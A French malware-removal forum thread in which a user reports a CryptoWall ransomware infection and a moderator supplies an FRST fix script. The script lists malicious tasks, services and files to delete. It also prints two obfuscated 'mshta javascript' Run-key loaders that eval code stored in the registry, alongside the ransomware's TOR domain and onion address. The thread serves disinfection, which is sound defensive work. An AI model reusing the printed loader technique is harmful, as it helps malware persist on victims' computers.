Infection avec cette saleté de CryptoWall sur Windows 7

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

simane ernest

Infection avec cette saleté de CryptoWall sur Windows 7

par simane ernest »

bozu,

j'ai un gros souci de CryptoWall, voici mes 3 rapports.

http://pjjoint.malekal.com/files.php?id ... 5u15y58s15
http://pjjoint.malekal.com/files.php?id ... 10h15n6f13
http://pjjoint.malekal.com/files.php?id ... 15w7k5k7q8

CryptoWall via TOR Proxy Domain
ayh2m57ruxjtwyd5.speralreaopio.com ( 95.128.181.13 )
xtpdvz6dnj5nnpe7.onion:8080/decrypt_service_k1f9aj5nfakejr1920mgl57sm1/
Image
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Haut
Malekal_morte
Messages : 113253
Inscription : 10 sept. 2005 13:57

Re: Infection avec cette saleté de CryptoWall sur Windows 7

par Malekal_morte »

Salut,

Ton ordinateur est complètement infesté par des Trojans et Adwares.
En outre, tu as deux clients torrent, Utorrent et Bittorent qui tourne. Désinstalle un des deux.
Désinstalle aussi Lavasoft Web companion, sert à rien.

Tu as été infecté par un Ransomware chiffreurs de fichiers.

Ces derniers vont essentiellement par des pièces jointes malicieux dans des emails ou des Exploits WEB.

Il n'y a pas vraiment de solution pour récupérer les documents.


Voici la correction à  effectuer avec FRST.
Tu peux t'inspirer de cette note explicative avec des captures d'écran pour t'aider: https://www.malekal.com/tutorial-farbar ... -frst/#fix

Ouvre le bloc-notes : Touche Windows + R, dans le champs executer, tape notepad et OK.
Copie/colle dedans ce qui suit :

Code : Tout sélectionner

Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-1-7.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-10_user.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-11.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-3.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-4.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5_user.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-7.job => C:\Program Files\SavePass 1.1\057ae7df-cbaf-4987-be6a-60033480b437-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\31KF7GHdyOOZkNChPv.job => C:\Users\DONBCI\AppData\Roaming\31KF7GHdyOOZkNChPv.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-10_user.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-11.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-3.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-4.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5_user.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-6.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-7.job => C:\Program Files\CinemaP-1.9cV17.09\3731ec71-8d83-493b-91c8-140a3eae3df8-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-10_user.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-10.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5_user.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.exe <==== ATTENTION
Task: C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.job => C:\Program Files\CinemaPlus-3.2cV16.09\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== ATTENTION
Task: C:\Windows\Tasks\Crossbrowse.job => C:\Program Files\Crossbrowse\Crossbrowse\Application\utility.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files\globalUpdate\Update\globalupdate.exe <==== ATTENTION
HKLM\...\Run: [Advanced File Optimizer] => C:\Program Files\Advanced File Optimizer\AdvancedFileOptimizer.exe -checkscheduledupdate 
 HKLM\...\Run: [ADSKAppManager] => C:\Program Files\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [523144 2015-07-30] (Autodesk Inc.)  
HKLM\...\Run: [**e9429085<*>] => mshta javascript:x6ZVFch4=G99hLJdMB;X8M4=new%20ActiveXObject(WScript.Shell);w1IcP7soUj=fK;vHZ1N=X8M4.RegRead(HKLM\\software\\90239bf8c8\\050e45fd);he1ueLk=7y64FkV;eval(vHZ1N);SzLnvr5xd=zMIu (l'élément de données a 8 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides) 
 HKLM\...\Policies\Explorer\Run: [1025202594] => C:\ProgramData\msnqoirw.exe [87040 2015-06-16] ()  
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 
HKLM\...\Policies\Explorer: [HideSCAHealth] 1 
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [GoogleChromeAutoLaunch_40617EE6F8FB564AD0CE3B5358FEE19A] => C:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --no-startup-window  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe [1402640 2015-09-10] (Lavasoft)  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [GoogleChromeAutoLaunch_02D2960CED9F374CFF98692758B97066] => C:\Program Files\MyBrowser\MyBrowser\Application\mybrowser.exe --no-startup-window  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [IZsoft] => C:\Users\DONBCI\AppData\Local\IZsoft\tmpE6F9.exe [188416 2015-09-22] (Mozilla Corporation)  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Apworks] => regsvr32.exe C:\Users\DONBCI\AppData\Local\Apworks\hbcpasdq.dll <===== ATTENTION  
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [Eption] => C:\Windows\System32\regsvr32.exe C:\Users\DONBCI\AppData\Local\IZsoft\nndxoczn.dll  
HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...\Run: [**e9429085<*>] => mshta javascript:B1bU4gtQ=oBgzkX;t1O=new%20ActiveXObject(WScript.Shell);vWCeP1lB=CmmR5;EYr0I5=t1O.RegRead(HKCU\\software\\90239bf8c8\\050e45fd);nC4TCsgrz=ayzy;eval(EYr0I5);L1o4Ukxc=HvZ9Rex1 (l'élément de données a 2 caractères en plus). <===== ATTENTION (Nom de valeur avec caractères invalides) 
 HKU\S-1-5-21-2230928724-2595705488-1355397441-1005\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\DONBCI\AppData\Local\IZsoft\lzbhixsg.dllATTENTION! ====> ZeroAccess?  
 ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier  
 ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-09-22] ()  
 Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\crossbrowse.lnk [2015-09-17]  
 ShortcutTarget: crossbrowse.lnk -> C:\Program Files\Crossbrowse\Crossbrowse\Application\crossbrowse.exe (Pas de fichier)  
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML [2015-09-22] () 
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG [2015-09-22] () 
Startup: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT [2015-09-22] () 
InternetURL: C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://ayh2m57ruxjtwyd5.speralreaopio.com/iip7Nf 
GroupPolicy: Restriction - Chrome <======= ATTENTION 
GroupPolicyScripts: Restriction <======= ATTENTION 
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION 
 C:\Users\DONBCI\AppData\Local\IZsoft
CustomCLSID: HKU\S-1-5-21-2230928724-2595705488-1355397441-1005_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\DONBCI\AppData\Local\IZsoft\lzbhixsg.dll ()
 S2 dipubibu; C:\Users\DONBCI\AppData\Local\4C4C4544-1442498897-5110-804E-C7C04F31354A\snsg4AC8.tmp [X] 
 S2 gyvixodu; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\hnswE39D.tmp [X] 
 S2 lehicewu; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\jnslC88C.tmp [X] 
 S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [X]  
 S2 zokerygi; C:\Program Files\4C4C4544-1442459250-5110-804E-C7C04F31354A\knsuA963.tmp [X] 
 S4 ServiceUpdater; C:\Windows\system32\netupdsrv.exe [191488 2015-09-18] () [Fichier non signé]  
 R2 WdsManPro; C:\ProgramData\eWdsManProe\WdsManPro.exe [451720 2015-09-17] (DTools LIMITED)  
 S2 DGDP56; C:\Users\DONBCI\AppData\Local\Htede\hôte.exe /s [X] 
 S2 globalUpdate; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-09-17] (globalUpdate) [Fichier non signé] <==== ATTENTION 
 S3 globalUpdatem; C:\Program Files\globalUpdate\Update\globalupdate.exe [68608 2015-09-17] (globalUpdate) [Fichier non signé] <==== ATTENTION 
 R2 LavasoftTcpService; C:\Program Files\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [2751760 2015-09-10] (Lavasoft Limited)  
 S2 NetHttpService; C:\Windows\system32\nethtsrv.exe [350720 2015-09-18] () [Fichier non signé]  
 R2 nowuedctep; C:\Users\DONBCI\AppData\Local\Vaiaholding.exe [77312 2015-09-17] () [Fichier non signé]  
 R1 nethfdrv; C:\Windows\system32\drivers\nethfdrv.sys [40528 2015-07-30] (nethfdrv)  
2015-09-22 08:04 - 2015-09-22 08:04 - 00008628 _____ C:\Users\DONBCI\HELP_DECRYPT.HTML 
 2015-09-22 08:04 - 2015-09-22 08:04 - 00004254 _____ C:\Users\DONBCI\HELP_DECRYPT.TXT  
 2015-09-22 07:53 - 2015-09-22 07:53 - 00008628 _____ C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 00008628 _____ C:\Users\DONBCI\AppData\HELP_DECRYPT.HTML 
 2015-09-22 07:53 - 2015-09-22 07:53 - 00004254 _____ C:\Users\DONBCI\AppData\Roaming\HELP_DECRYPT.TXT  
 2015-09-22 07:53 - 2015-09-22 07:53 - 00004254 _____ C:\Users\DONBCI\AppData\HELP_DECRYPT.TXT  
 2015-09-22 07:50 - 2015-09-22 07:50 - 00008628 _____ C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.HTML 
 2015-09-22 07:50 - 2015-09-22 07:50 - 00004254 _____ C:\Users\DONBCI\AppData\Local\HELP_DECRYPT.TXT  
 2015-09-22 07:47 - 2015-09-22 07:47 - 00008628 _____ C:\ProgramData\HELP_DECRYPT.HTML 
 2015-09-22 07:47 - 2015-09-22 07:47 - 00004254 _____ C:\ProgramData\HELP_DECRYPT.TXT  
 2015-09-22 07:31 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Apworks 
 2015-09-22 07:30 - 2015-09-25 09:19 - 00000000 ____D C:\Users\DONBCI\AppData\Local\IZsoft 
 2015-09-22 07:19 - 2015-09-22 07:19 - 28850288 _____ C:\Users\DONBCI\Downloads\vlc-media-player_2-2-1_fr_10829_32.rar  
 2015-09-22 07:17 - 2015-09-22 07:21 - 28849904 _____ C:\Users\DONBCI\Downloads\vlc-media-player_2-2-1_fr_10829_32 
 2015-09-22 05:49 - 2015-09-22 05:49 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\SimpleFiles 
 2015-09-21 17:48 - 2015-09-21 18:20 - 00566696 _____ (MJSHJ) C:\Users\DONBCI\Downloads\Setup.exe  
 2015-09-21 17:42 - 2015-09-21 18:03 - 103542096 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_1080p-[www.mksniper.fr]-Premium-DL.rar.jy5xdin.partial 
 2015-09-21 17:34 - 2015-09-21 22:18 - 739246080 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar  
 2015-09-21 17:06 - 2015-09-21 17:06 - 00014509 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar (1).torrent 
 2015-09-21 17:03 - 2015-09-22 07:20 - 00014509 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_en_qualite_HD_720p-LEGiON.rar.torrent 
 2015-09-19 21:25 - 2015-09-19 21:26 - 01575184 _____ (NCH Software) C:\Users\DONBCI\Downloads\debutsetup.exe  
 2015-09-19 21:07 - 2015-09-19 21:35 - 00000000 ____D C:\Program Files\NCH Software  
 2015-09-19 21:07 - 2015-09-19 21:34 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\NCH Software  
 2015-09-19 21:07 - 2015-09-19 21:33 - 00000000 ____D C:\ProgramData\NCH Software  
 2015-09-19 21:00 - 2015-09-19 21:13 - 00000000 ____D C:\ProgramData\WinZip  
 2015-09-19 12:55 - 2015-09-19 15:01 - 733004602 _____ C:\Users\DONBCI\Downloads\Film_complet_en_francais_HD_TrueFrench 720p- YIFY.zip 
 2015-09-19 00:40 - 2015-03-13 21:07 - 00303616 _____ C:\Users\DONBCI\Desktop\xf-adsk2016_x86.exe  
 2015-09-18 22:19 - 2015-09-18 22:22 - 00000000 ____D C:\ProgramData\Reimage Protector  
 2015-09-18 22:19 - 2015-09-18 22:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair  
 2015-09-18 22:18 - 2015-09-25 09:16 - 00000000 ____D C:\Program Files\Reimage  
 2015-09-18 22:18 - 2015-09-22 09:38 - 00000000 ____D C:\rei 
 2015-09-18 22:11 - 2015-09-22 09:37 - 00000148 _____ C:\Windows\Reimage.ini  
 2015-09-18 21:38 - 2015-09-18 21:39 - 00000000 ____D C:\ProgramData\Google  
 2015-09-18 21:32 - 2015-09-18 21:32 - 00000687 _____ C:\awh46DF.tmp  
 2015-09-18 20:12 - 2015-09-18 20:17 - 00823984 _____ C:\Users\DONBCI\Downloads\XFORCEKeygen3264bits__11652_il119461.exe 
 2015-09-17 16:21 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Enigma Software Group  
 2015-09-17 16:20 - 2015-09-17 16:21 - 00000000 ____D C:\sh4ldr 
 2015-09-17 15:35 - 2015-09-17 15:36 - 02077392 _____ (Microsoft Corporation) C:\Users\DONBCI\Downloads\IE11-Windows6.1.exe 
 2015-09-17 15:22 - 2015-09-25 17:22 - 00003128 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-6.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00003464 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-1-7.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00002436 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5_user.job  
 2015-09-17 15:22 - 2015-09-25 15:22 - 00002436 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-5.job  
 2015-09-17 15:21 - 2015-09-25 17:21 - 00005508 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-6.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00005508 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-7.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00005174 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-11.job  
 2015-09-17 15:21 - 2015-09-25 15:21 - 00004484 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-4.job  
 2015-09-17 15:20 - 2015-09-25 17:20 - 00002102 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-10_user.job  
 2015-09-17 15:20 - 2015-09-25 15:21 - 00004484 _____ C:\Windows\Tasks\af8f58b5-c40f-436f-bd0c-e64107911c5d-3.job  
 2015-09-17 15:20 - 2015-09-20 15:23 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP3.job  
 2015-09-17 15:20 - 2015-09-17 17:15 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP2.job  
 2015-09-17 15:20 - 2015-09-17 15:52 - 00000366 _____ C:\Windows\Tasks\APSnotifierPP1.job  
 2015-09-17 15:20 - 2015-09-17 15:20 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnyProtect PC Backup  
 2015-09-17 15:18 - 2015-09-25 15:18 - 00001038 _____ C:\Windows\Tasks\MyBrowser.job  
 2015-09-17 15:18 - 2015-09-25 09:15 - 00000000 ____D C:\Users\DONBCI\AppData\Local\MyBrowser  
 2015-09-17 15:17 - 2015-09-17 15:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MyBrowser 
 2015-09-17 15:16 - 2015-09-23 08:50 - 00000000 __SHD C:\Users\DONBCI\AppData\Roaming\AnyProtectEx  
 2015-09-17 15:16 - 2015-09-17 15:16 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsc8F51.tmp 
 2015-09-17 15:13 - 2015-09-17 15:13 - 00000000 ____D C:\ProgramData\eWdsManProe 
 2015-09-17 14:33 - 2015-09-17 14:33 - 00000000 ____D C:\Program Files\OLBPre  
 2015-09-17 14:32 - 2015-09-17 14:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced System~Protector 
 2015-09-17 14:32 - 2015-09-17 14:32 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Systweak  
 2015-09-17 14:32 - 2015-09-17 14:32 - 00000000 ____D C:\ProgramData\Systweak  
 2015-09-17 14:32 - 2015-09-11 15:15 - 00018248 _____ C:\Windows\system32\sasnative32.exe  
 2015-09-17 14:30 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\istartsurf  
 2015-09-17 14:30 - 2015-09-18 20:02 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\systweak  
 2015-09-17 14:30 - 2015-09-17 14:30 - 00000000 ____D C:\ProgramData\OWdsManProO 
 2015-09-17 14:30 - 2015-07-02 14:14 - 00018200 _____ () C:\Windows\system32\roboot.exe  
 2015-09-17 14:28 - 2015-09-18 22:05 - 00000000 ____D C:\Users\DONBCI\AppData\Local\3496 
 2015-09-17 14:17 - 2015-09-17 14:17 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\mystartsearch  
 2015-09-17 14:17 - 2015-09-17 14:17 - 00000000 ____D C:\ProgramData\aWdsManProa 
 2015-09-17 14:09 - 2015-09-25 14:10 - 00002418 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5_user.job  
 2015-09-17 14:09 - 2015-09-25 14:10 - 00002418 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-5.job  
 2015-09-17 14:08 - 2015-09-25 17:08 - 00002084 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-10_user.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00005156 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-11.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00005154 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-7.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00004130 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-4.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00004130 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-3.job  
 2015-09-17 14:08 - 2015-09-25 14:10 - 00003446 _____ C:\Windows\Tasks\057ae7df-cbaf-4987-be6a-60033480b437-1-7.job  
 2015-09-17 14:08 - 2015-09-25 09:17 - 00000000 ____D C:\Program Files\SavePass 1.1  
 2015-09-17 14:08 - 2015-09-23 07:18 - 00000000 ____D C:\Users\DONBCI\AppData\Local\4C4C4544-1442498897-5110-804E-C7C04F31354A 
 2015-09-17 14:08 - 2015-09-17 14:08 - 00000000 ____D C:\Program Files\bae8bc23-98a4-45af-981d-6a8d8526c42d 
 2015-09-17 14:07 - 2015-09-25 09:16 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\VOPackage  
 2015-09-17 14:07 - 2015-09-18 22:25 - 00000000 ____D C:\Program Files\NixSrv 
 2015-09-17 14:07 - 2015-09-17 14:07 - 00077312 _____ C:\Users\DONBCI\AppData\Local\Vaiaholding.exe  
 2015-09-17 14:07 - 2015-09-17 14:07 - 00000187 _____ C:\Users\DONBCI\AppData\Local\Vaiaholding.exe.config  
 2015-09-17 14:07 - 2015-09-17 14:07 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage  
 2015-09-17 14:04 - 2015-09-25 14:10 - 00001046 _____ C:\Windows\Tasks\Crossbrowse.job 
 2015-09-17 14:04 - 2015-09-25 09:15 - 00000000 ____D C:\Users\DONBCI\AppData\Local\Crossbrowse  
 2015-09-17 14:04 - 2015-09-17 14:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Crossbrowse  
 2015-09-17 14:02 - 2015-09-25 17:02 - 00005502 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-6.job  
 2015-09-17 14:02 - 2015-09-25 17:02 - 00003122 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-6.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00005166 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-7.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00004142 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-4.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00003122 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-1-7.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00002430 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5_user.job  
 2015-09-17 14:02 - 2015-09-25 14:10 - 00002430 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-5.job  
 2015-09-17 14:02 - 2015-09-17 14:02 - 00000000 ____D C:\Program Files\c7d7dd19-9990-4ca4-ba57-a64130cd4348 
 2015-09-17 14:01 - 2015-09-25 17:01 - 00002096 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-10_user.job  
 2015-09-17 14:01 - 2015-09-25 15:26 - 00000964 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job  
 2015-09-17 14:01 - 2015-09-25 15:26 - 00000960 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job  
 2015-09-17 14:01 - 2015-09-25 14:10 - 00005168 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-11.job  
 2015-09-17 14:01 - 2015-09-25 14:10 - 00004142 _____ C:\Windows\Tasks\3731ec71-8d83-493b-91c8-140a3eae3df8-3.job  
 2015-09-17 14:01 - 2015-09-25 09:16 - 00000000 ____D C:\Program Files\globalUpdate  
 2015-09-17 14:01 - 2015-09-17 14:01 - 00000000 ____D C:\Users\DONBCI\AppData\Local\globalUpdate  
 2015-09-17 13:59 - 2015-09-18 21:30 - 00823984 _____ C:\Users\DONBCI\Documents\XFORCEKeygen3264bits__11652_il119461.exe 
 2015-09-17 12:47 - 2015-09-17 12:47 - 00001970 _____ C:\Users\Public\Desktop\A360 Desktop.lnk 
 2015-09-17 12:26 - 2015-09-17 12:52 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared  
 2015-09-17 09:50 - 2015-09-17 09:50 - 00000000 ____D C:\Users\DONBCI\AppData\Roaming\oursurfing  
 2015-09-17 09:50 - 2015-09-17 09:50 - 00000000 ____D C:\ProgramData\FWdsManProF 
 2015-09-16 22:56 - 2015-09-16 22:56 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsy84C4.tmp 
 2015-09-16 08:46 - 2015-09-16 08:46 - 00613255 _____ (CMI Limited) C:\Users\DONBCI\AppData\Local\nsb293D.tmp 
